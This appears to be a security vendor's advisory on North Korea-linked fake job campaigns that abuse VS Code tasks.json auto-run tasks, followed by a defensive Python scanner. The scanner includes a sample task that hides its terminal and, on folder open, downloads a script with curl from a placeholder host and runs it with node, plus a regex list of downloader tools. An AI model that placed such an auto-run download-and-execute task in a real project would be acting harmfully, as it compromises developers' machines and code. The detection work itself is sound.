At a glance: Threat actors are targeting developers by abusing trusted Visual Studio Code functionality, using social engineering to persuade victims to clone malicious repositories as part of fake job assessments. The activity does not rely on software vulnerabilities, instead leveraging legitimate developer workflows to enable command execution and access to source code and build environments.
Threat summary
On January 20, researchers documented North Korea-linked threat actor activity targeting Microsoft Visual Studio (VS) Code using techniques that enable remote code execution when a developer opens a malicious project folder. The technique, first observed in December 2025, reflects an evolution of earlier job recruitment-related campaigns attributed to North Korea.
The activity relies on the use of Visual Studio Code configuration files to trigger attacker‑controlled commands. The attack abuses the `.vscode/tasks.json` file, a legitimate mechanism developers use to automate build and test workflows. When a user opens a project and grants trust to the workspace, Visual Studio Code executes the tasks defined in this file.
According to available reporting, threat actors embedded shell commands that download and run a JavaScript backdoor hosted on Vercel, a cloud platform used by developers to deploy web applications.
Execution begins as soon as the project is opened and the workspace trust prompt is accepted, requiring no further user interaction and bypassing traditional malware delivery paths. The resulting impact includes remote code execution and the deployment of a backdoor implant capable of system reconnaissance and follow‑on actions.
Continuing the social-engineering pattern seen in prior North Korea‑linked operations, the operators instruct targets to clone repositories from GitHub, GitLab, or Bitbucket as part of a fake job assessment.
Insights
The exploitation difficulty is low because the attack uses legitimate functionality, meaning the primary obstacle for threat actors is persuading a developer to open a malicious repository.
Visual Studio Code is a widely used integrated development environment created by Microsoft. It supports extensions, remote development, and workspace trust controls, and is used across enterprises, managed service providers, and software supply chains. Threat actors target Visual Studio Code largely because it enables malicious command execution through trusted developer workflows, providing direct access to source code and build environments with minimal user interaction.
Threat actors increasingly target the software development lifecycle itself (including repositories, build tools, package scripts, and trust prompts) because these pathways offer reliable execution without requiring a vulnerability.
Recommendations
Organizations can reduce exposure by tightening how workspace trust is granted in Visual Studio Code. Recommendations include enforcing workspace trust policies, restricting automatic task execution, and monitoring for unexpected changes to `.vscode` directories. Development teams can adopt internal repository controls to reduce reliance on unverified external code, and endpoint monitoring can flag unexpected shell execution spawned by Visual Studio Code processes.
Organizations can further reduce risk by training developers to treat external repositories as potential attack vectors. Incorporating Visual Studio Code configuration scanning into routine assessments and applying network controls that block unauthorized outbound connections can limit the impact of malicious tasks attempting to download remote payloads.
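As an added example (not code from the advisory or from Field Effect), the following Python audit implements the configuration scanning recommended above: it parses a repository's `.vscode/tasks.json` files and flags tasks configured to start automatically when a trusted folder is opened (`runOptions.runOn: "folderOpen"`, the documented VS Code option for that behaviour), tasks whose command line invokes a downloader, and tasks that suppress their terminal output. The sample tasks.json, its task label and its placeholder host are constructed for the example.

```python
import json
import re
from pathlib import Path

# Assumed from the VS Code task documentation, not from the advisory:
# a task with runOptions.runOn == "folderOpen" starts as soon as a trusted
# workspace is opened; presentation.reveal == "never" hides its terminal.
AUTO_RUN = "folderOpen"
HIDDEN = "never"
# Common download/launch primitives seen in task command lines.
DOWNLOAD_RE = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|node\s+-e|powershell)\b", re.I)


def _strip_jsonc(text: str) -> str:
    """tasks.json is JSONC: drop block comments and full-line // comments."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)


def _command_line(task: dict) -> str:
    parts = [str(task.get("command", ""))]
    parts += [str(a) for a in task.get("args", [])]
    return " ".join(parts).strip()


def audit_tasks_json(text: str) -> list[dict]:
    """Return one finding per task that auto-runs, downloads, or hides output."""
    data = json.loads(_strip_jsonc(text))
    findings = []
    for task in data.get("tasks", []):
        cmd = _command_line(task)
        auto = task.get("runOptions", {}).get("runOn") == AUTO_RUN
        downloader = bool(DOWNLOAD_RE.search(cmd))
        hidden = task.get("presentation", {}).get("reveal") == HIDDEN
        if auto or downloader:
            findings.append({"label": task.get("label", "<unnamed>"),
                             "auto_run": auto, "downloader": downloader,
                             "hidden": hidden, "command": cmd})
    return findings


def audit_repo(root: Path) -> dict[str, list[dict]]:
    """Map each tasks.json under root (relative path) to its findings."""
    results = {}
    for path in root.glob("**/.vscode/tasks.json"):
        findings = audit_tasks_json(path.read_text(encoding="utf-8"))
        if findings:
            results[str(path.relative_to(root))] = findings
    return results


# Constructed sample modelled on the advisory; the host is a placeholder.
SAMPLE_TASKS_JSON = r'''{
    // build task is benign; the second task is the pattern to catch
    "version": "2.0.0",
    "tasks": [
        {"label": "build", "type": "shell", "command": "npm run build"},
        {"label": "Install dependencies", "type": "shell",
         "command": "curl -s https://placeholder.example.invalid/setup.js -o /tmp/s.js && node /tmp/s.js",
         "runOptions": {"runOn": "folderOpen"},
         "presentation": {"reveal": "never"}}
    ]
}'''
```

Run `audit_repo(Path("path/to/clone"))` against a freshly cloned repository before opening it in the editor; any finding with `auto_run` set deserves a look before workspace trust is granted.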
Field Effect MDR continuously monitors endpoint and network activity, detecting unusual script execution, unauthorized outbound connections, and suspicious repository-related behavior. Should malicious activity be identified, Field Effect MDR provides automated or analyst-driven response actions such as isolating affected endpoints and blocking outbound traffic to attacker infrastructure.